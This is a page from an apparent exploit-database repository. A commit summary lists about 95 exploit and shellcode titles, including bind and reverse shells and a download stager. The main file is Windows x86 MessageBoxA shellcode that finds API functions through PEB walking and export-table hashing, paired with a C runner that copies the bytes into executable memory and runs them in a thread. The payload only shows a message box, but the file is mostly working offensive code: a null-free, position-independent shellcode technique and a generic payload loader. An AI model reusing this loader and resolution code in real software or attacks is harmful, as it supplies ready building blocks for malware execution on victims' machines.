de260aeac6
95 changes to exploits/shellcodes Product Key Explorer 4.2.7 - 'multiple' Denial of Service (PoC) Managed Switch Port Mapping Tool 2.85.2 - Denial of Service (PoC) AgataSoft PingMaster Pro 2.1 - Denial of Service (PoC) Nsauditor 3.2.2.0 - 'Event Description' Denial of Service (PoC) WordPress Plugin WPGraphQL 1.3.5 - Denial of Service Sandboxie 5.49.7 - Denial of Service (PoC) WebSSH for iOS 14.16.10 - 'mashREPL' Denial of Service (PoC) iDailyDiary 4.30 - Denial of Service (PoC) RarmaRadio 2.72.8 - Denial of Service (PoC) DupTerminator 1.4.5639.37199 - Denial of Service (PoC) Color Notes 1.4 - Denial of Service (PoC) Macaron Notes great notebook 5.5 - Denial of Service (PoC) My Notes Safe 5.3 - Denial of Service (PoC) n+otes 1.6.2 - Denial of Service (PoC) Telegram Desktop 2.9.2 - Denial of Service (PoC) Mini-XML 3.2 - Heap Overflow Solaris 10 (Intel) - 'dtprintinfo' Local Privilege Escalation (2) Solaris 10 (Intel) - 'dtprintinfo' Local Privilege Escalation (3) Solaris 10 (SPARC) - 'dtprintinfo' Local Privilege Escalation (1) Solaris 10 (SPARC) - 'dtprintinfo' Local Privilege Escalation (2) MariaDB 10.2 - 'wsrep_provider' OS Command Execution Microsoft Internet Explorer 11 and WPAD service 'Jscript.dll' - Use-After-Free Visual Studio Code 1.47.1 - Denial of Service (PoC) DELL dbutil_2_3.sys 2.3 - Arbitrary Write to Local Privilege Escalation (LPE) MySQL User-Defined (Linux) x32 / x86_64 - 'sys_exec' Local Privilege Escalation (2) Cmder Console Emulator 1.3.18 - 'Cmder.exe' Denial of Service (PoC) GNU Wget < 1.18 - Arbitrary File Upload (2) WebCTRL OEM 6.5 - 'locale' Reflected Cross-Site Scripting (XSS) E-Learning System 1.0 - Authentication Bypass PEEL Shopping 9.3.0 - 'Comments' Persistent Cross-Site Scripting GetSimple CMS 3.3.16 - Persistent Cross-Site Scripting EgavilanMedia User Registration & Login System with Admin Panel 1.0 - Persistent Cross-Site Scripting Selea Targa 512 IP OCR-ANPR Camera - Stream Disclosure (Unauthenticated) Library System 1.0 - Authentication Bypass Web Based Quiz System 1.0 - 'name' Persistent Cross-Site Scripting Dolibarr ERP 11.0.4 - File Upload Restrictions Bypass (Authenticated RCE) GetSimple CMS My SMTP Contact Plugin 1.1.1 - Cross-Site Request Forgery GravCMS 1.10.7 - Unauthenticated Arbitrary File Write (Metasploit) Umbraco v8.14.1 - 'baseUrl' SSRF Cacti 1.2.12 - 'filter' SQL Injection GetSimple CMS Custom JS 0.1 - Cross-Site Request Forgery Internship Portal Management System 1.0 - Remote Code Execution(Unauthenticated) Markdown Explorer 0.1.1 - Persistent Cross-Site Scripting Xmind 2020 - Persistent Cross-Site Scripting Tagstoo 2.0.1 - Persistent Cross-Site Scripting SnipCommand 0.1.0 - Persistent Cross-Site Scripting Moeditor 0.2.0 - Persistent Cross-Site Scripting Marky 0.0.1 - Persistent Cross-Site Scripting StudyMD 0.3.2 - Persistent Cross-Site Scripting Freeter 1.2.1 - Persistent Cross-Site Scripting Markright 1.0 - Persistent Cross-Site Scripting Markdownify 1.2.0 - Persistent Cross-Site Scripting Anote 1.0 - Persistent Cross-Site Scripting Subrion CMS 4.2.1 - Arbitrary File Upload Printable Staff ID Card Creator System 1.0 - 'email' SQL Injection Schlix CMS 2.2.6-6 - Arbitary File Upload (Authenticated) Selenium 3.141.59 - Remote Code Execution (Firefox/geckodriver) CHIYU IoT Devices - Denial of Service (DoS) Zenario CMS 8.8.52729 - 'cID' SQL injection (Authenticated) TextPattern CMS 4.8.7 - Remote Command Execution (Authenticated) WordPress Plugin Anti-Malware Security and Bruteforce Firewall 4.20.59 - Directory Traversal Atlassian Jira Server Data Center 8.16.0 - Reflected Cross-Site Scripting (XSS) Scratch Desktop 3.17 - Remote Code Execution Church Management System 1.0 - Arbitrary File Upload (Authenticated) Phone Shop Sales Managements System 1.0 - Arbitrary File Upload Zoo Management System 1.0 - 'Multiple' Persistent Cross-Site-Scripting (XSS) WordPress Plugin Current Book 1.0.1 - 'Book Title' Persistent Cross-Site Scripting ForgeRock Access Manager 14.6.3 - Remote Code Execution (RCE) (Unauthenticated) KevinLAB BEMS 1.0 - Authentication Bypass Event Registration System with QR Code 1.0 - Authentication Bypass CloverDX 5.9.0 - Cross-Site Request Forgery (CSRF) Panasonic Sanyo CCTV Network Camera 2.03-0x - Cross-Site Request Forgery (Change Password) qdPM 9.2 - Password Exposure (Unauthenticated) ApacheOfBiz 17.12.01 - Remote Command Execution (RCE) Movable Type 7 r.5002 - XMLRPC API OS Command Injection (Metasploit) GeoVision Geowebserver 5.3.3 - Local FIle Inclusion Simple Phone Book 1.0 - 'Username' SQL Injection (Unauthenticated) Umbraco CMS 8.9.1 - Directory Traversal Traffic Offense Management System 1.0 - Remote Code Execution (RCE) (Unauthenticated) Dolibarr ERP 14.0.1 - Privilege Escalation Compro Technology IP Camera - 'killps.cgi' Denial of Service (DoS) Drupal Module MiniorangeSAML 8.x-2.22 - Privilege escalation Phpwcms 1.9.30 - Arbitrary File Upload Windows/x86 - Download File (http://10.10.10.5:8080/2NWyfQ9T.hta) Via mshta + Execute + Stager Shellcode (143 bytes) Linux/x64 - Bind_tcp (0.0.0.0:4444) + Password (12345678) + Shell (/bin/sh) Shellcode (142 bytes) Linux/x64 - execve _cat /etc/shadow_ Shellcode (66 bytes) Windows/x86 - Add User Alfred to Administrators/Remote Desktop Users Group Shellcode (240 bytes) Windows/x64 - Dynamic Null-Free WinExec PopCalc Shellcode (205 Bytes) Windows/x64 - Dynamic NoNull Add RDP Admin (BOKU:SP3C1ALM0V3) Shellcode (387 Bytes) Linux/x86 - setreuid(0) + execve(_/bin/sh_) Shellcode (29 bytes) Linux/x86 - Bind (User Specified Port) Shell (/bin/sh) Shellcode (102 bytes) Linux/x86 - Reverse (dynamic IP and port/TCP) Shell (/bin/sh) Shellcode (86 bytes) Linux/x86 - Egghunter Reverse TCP Shell dynamic IP and port Shellcode Windows/x86 - WinExec PopCalc PEB & Export Directory Table NullFree Dynamic Shellcode (178 bytes) Windows/x86 - MessageBoxA PEB & Export Address Table NullFree/Dynamic Shellcode (230 bytes)
196 lines
No EOL
8.1 KiB
C
196 lines
No EOL
8.1 KiB
C
; Name: Windows/x86 - MessageBoxA PEB & Export Address Table NullFree/Dynamic Shellcode (230 bytes)
|
|
; Author: h4pp1n3ss
|
|
; Date: Wed 09/23/2021
|
|
; Tested on: Microsoft Windows [Version 10.0.19042.1237]
|
|
|
|
; Description:
|
|
; This is a shellcode that
|
|
; pop a MessageBox and show the text "Pwn3d by h4pp1n3ss". In order to accomplish this task the shellcode uses
|
|
; the PEB method to locate the baseAddress of the required module and the Export Directory Table
|
|
; to locate symbols. Also the shellcode uses a hash function to gather dynamically the required
|
|
; symbols without worry about the length.
|
|
|
|
|
|
|
|
start:
|
|
mov ebp, esp ;
|
|
add esp, 0xfffff9f0 ; Avoid NULL bytes
|
|
|
|
find_kernel32:
|
|
xor ecx, ecx ; ECX = 0
|
|
mov esi,fs:[ecx+0x30] ; ESI = &(PEB) ([FS:0x30])
|
|
mov esi,[esi+0x0C] ; ESI = PEB->Ldr
|
|
mov esi,[esi+0x1C] ; ESI = PEB->Ldr.InInitOrder
|
|
|
|
next_module:
|
|
mov ebx, [esi+0x08] ; EBX = InInitOrder[X].base_address
|
|
mov edi, [esi+0x20] ; EDI = InInitOrder[X].module_name
|
|
mov esi, [esi] ; ESI = InInitOrder[X].flink (next)
|
|
cmp [edi+12*2], cx ; (unicode) modulename[12] == 0x00 ?
|
|
jne next_module ; No: try next module
|
|
|
|
find_function_shorten:
|
|
jmp find_function_shorten_bnc ; Short jump
|
|
|
|
find_function_ret:
|
|
pop esi ; POP the return address from the stack
|
|
mov [ebp+0x04], esi ; Save find_function address for later usage
|
|
jmp resolve_symbols_kernel32 ;
|
|
|
|
find_function_shorten_bnc:
|
|
call find_function_ret ; Relative CALL with negative offset
|
|
|
|
find_function:
|
|
pushad ; Save all registers
|
|
mov eax, [ebx+0x3c] ; Offset to PE Signature
|
|
mov edi, [ebx+eax+0x78] ; Export Table Directory RVA
|
|
add edi, ebx ; Export Table Directory VMA
|
|
mov ecx, [edi+0x18] ; NumberOfNames
|
|
mov eax, [edi+0x20] ; AddressOfNames RVA
|
|
add eax, ebx ; AddressOfNames VMA
|
|
mov [ebp-4], eax ; Save AddressOfNames VMA for later
|
|
|
|
find_function_loop:
|
|
jecxz find_function_finished ; Jump to the end if ECX is 0
|
|
dec ecx ; Decrement our names counter
|
|
mov eax, [ebp-4] ; Restore AddressOfNames VMA
|
|
mov esi, [eax+ecx*4] ; Get the RVA of the symbol name
|
|
add esi, ebx ; Set ESI to the VMA of the current symbol name
|
|
|
|
compute_hash:
|
|
xor eax, eax ; NULL EAX
|
|
cdq ; NULL EDX
|
|
cld ; Clear direction
|
|
|
|
compute_hash_again:
|
|
lodsb ; Load the next byte from esi into al
|
|
test al, al ; Check for NULL terminator
|
|
jz compute_hash_finished ; If the ZF is set, we've hit the NULL term
|
|
ror edx, 0x0d ; Rotate edx 13 bits to the right
|
|
add edx, eax ; Add the new byte to the accumulator
|
|
jmp compute_hash_again ; Next iteration
|
|
|
|
compute_hash_finished:
|
|
|
|
find_function_compare:
|
|
cmp edx, [esp+0x24] ; Compare the computed hash with the requested hash
|
|
jnz find_function_loop ; If it doesn't match go back to find_function_loop
|
|
mov edx, [edi+0x24] ; AddressOfNameOrdinals RVA
|
|
add edx, ebx ; AddressOfNameOrdinals VMA
|
|
mov cx, [edx+2*ecx] ; Extrapolate the function's ordinal
|
|
mov edx, [edi+0x1c] ; AddressOfFunctions RVA
|
|
add edx, ebx ; AddressOfFunctions VMA
|
|
mov eax, [edx+4*ecx] ; Get the function RVA
|
|
add eax, ebx ; Get the function VMA
|
|
mov [esp+0x1c], eax ; Overwrite stack version of eax from pushad
|
|
|
|
find_function_finished:
|
|
popad ; Restore registers
|
|
ret ;
|
|
|
|
resolve_symbols_kernel32:
|
|
push 0xec0e4e8e ; LoadLibraryA hash
|
|
call dword [ebp+0x04] ; Call find_function
|
|
mov [ebp+0x10], eax ; Save LoadLibraryA address for later usage
|
|
push 0x78b5b983 ; TerminateProcess hash
|
|
call dword [ebp+0x04] ; Call find_function
|
|
mov [ebp+0x14], eax ; Save TerminateProcess address for later usage
|
|
|
|
load_user32_lib:
|
|
xor eax, eax ; EAX = Null
|
|
mov ax, 0x6c6c;
|
|
push eax; ; Stack = "ll"
|
|
push dword 0x642e3233; ; Stack = "32.dll"
|
|
push dword 0x72657355; ; Stack = "User32.dll"
|
|
push esp ; Stack = &("User32.dll")
|
|
call dword [ebp+0x10] ; Call LoadLibraryA
|
|
|
|
resolve_symbols_user32:
|
|
mov ebx, eax ; Move the base address of user32.dll to EBX
|
|
push 0xbc4da2a8 ; MessageBoxA hash
|
|
call dword [ebp+0x04] ; Call find_function
|
|
mov [ebp+0x18], eax ; Save MessageBoxA address for later usage
|
|
|
|
call_MessageBoxA:
|
|
xor eax, eax ; EAX = NULL
|
|
mov ax, 0x7373 ; "ss"
|
|
push eax ; Stack = "ss"
|
|
push dword 0x336e3170 ; Stack = "p1n3ss"
|
|
push dword 0x70346820 ; Stack = " h4pp1n3ss"
|
|
push dword 0x79622064 ; Stack = "d by h4pp1n3ss"
|
|
push dword 0x336e7750 ; Stack = "Pwn3d by h4pp1n3ss"
|
|
push esp ; Stack = &("Pwn3d by h4pp1n3ss")
|
|
mov ebx, [esp] ; EBX = &(push_inst_greetings)
|
|
xor eax, eax ; EAX = NULL
|
|
push eax ; uType
|
|
push ebx ; lpCaption
|
|
push ebx ; lpText
|
|
push eax ; hWnd
|
|
call dword [ebp+0x18] ; Call MessageBoxA
|
|
|
|
call_TerminateProcess:
|
|
xor eax, eax ; EAX = null
|
|
push eax ; uExitCode
|
|
push 0xffffffff ; hProcess
|
|
call dword [ebp+0x14] ; Call TerminateProcess
|
|
|
|
|
|
[!]===================================== POC ========================================= [!]
|
|
|
|
/*
|
|
|
|
Shellcode runner author: reenz0h (twitter: @sektor7net)
|
|
|
|
*/
|
|
#include <windows.h>
|
|
#include <stdio.h>
|
|
#include <stdlib.h>
|
|
#include <string.h>
|
|
|
|
// Our MessageBoxA shellcode
|
|
unsigned char payload[] =
|
|
"\x89\xe5\x81\xc4\xf0\xf9\xff\xff\x31\xc9\x64\x8b\x71\x30\x8b\x76\x0c\x8b"
|
|
"\x76\x1c\x8b\x5e\x08\x8b\x7e\x20\x8b\x36\x66\x39\x4f\x18\x75\xf2\xeb\x06"
|
|
"\x5e\x89\x75\x04\xeb\x54\xe8\xf5\xff\xff\xff\x60\x8b\x43\x3c\x8b\x7c\x03"
|
|
"\x78\x01\xdf\x8b\x4f\x18\x8b\x47\x20\x01\xd8\x89\x45\xfc\xe3\x36\x49\x8b"
|
|
"\x45\xfc\x8b\x34\x88\x01\xde\x31\xc0\x99\xfc\xac\x84\xc0\x74\x07\xc1\xca"
|
|
"\x0d\x01\xc2\xeb\xf4\x3b\x54\x24\x24\x75\xdf\x8b\x57\x24\x01\xda\x66\x8b"
|
|
"\x0c\x4a\x8b\x57\x1c\x01\xda\x8b\x04\x8a\x01\xd8\x89\x44\x24\x1c\x61\xc3"
|
|
"\x68\x8e\x4e\x0e\xec\xff\x55\x04\x89\x45\x10\x68\x83\xb9\xb5\x78\xff\x55"
|
|
"\x04\x89\x45\x14\x31\xc0\x66\xb8\x6c\x6c\x50\x68\x33\x32\x2e\x64\x68\x55"
|
|
"\x73\x65\x72\x54\xff\x55\x10\x89\xc3\x68\xa8\xa2\x4d\xbc\xff\x55\x04\x89"
|
|
"\x45\x18\x31\xc0\x66\xb8\x73\x73\x50\x68\x70\x31\x6e\x33\x68\x20\x68\x34"
|
|
"\x70\x68\x64\x20\x62\x79\x68\x50\x77\x6e\x33\x54\x8b\x1c\x24\x31\xc0\x50"
|
|
"\x53\x53\x50\xff\x55\x18\x31\xc0\x50\x6a\xff\xff\x55\x14";
|
|
|
|
|
|
unsigned int payload_len = 230;
|
|
|
|
int main(void) {
|
|
|
|
void * exec_mem;
|
|
BOOL rv;
|
|
HANDLE th;
|
|
DWORD oldprotect = 0;
|
|
|
|
// Allocate a memory buffer for payload
|
|
exec_mem = VirtualAlloc(0, payload_len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
|
|
|
|
// Copy payload to new buffer
|
|
RtlMoveMemory(exec_mem, payload, payload_len);
|
|
|
|
// Make new buffer as executable
|
|
rv = VirtualProtect(exec_mem, payload_len, PAGE_EXECUTE_READ, &oldprotect);
|
|
|
|
printf("\nHit me!\n");
|
|
printf("Shellcode Length: %d\n", strlen(payload));
|
|
getchar();
|
|
|
|
// If all good, run the payload
|
|
if ( rv != 0 ) {
|
|
th = CreateThread(0, 0, (LPTHREAD_START_ROUTINE) exec_mem, 0, 0, 0);
|
|
WaitForSingleObject(th, -1);
|
|
}
|
|
|
|
return 0;
|
|
} |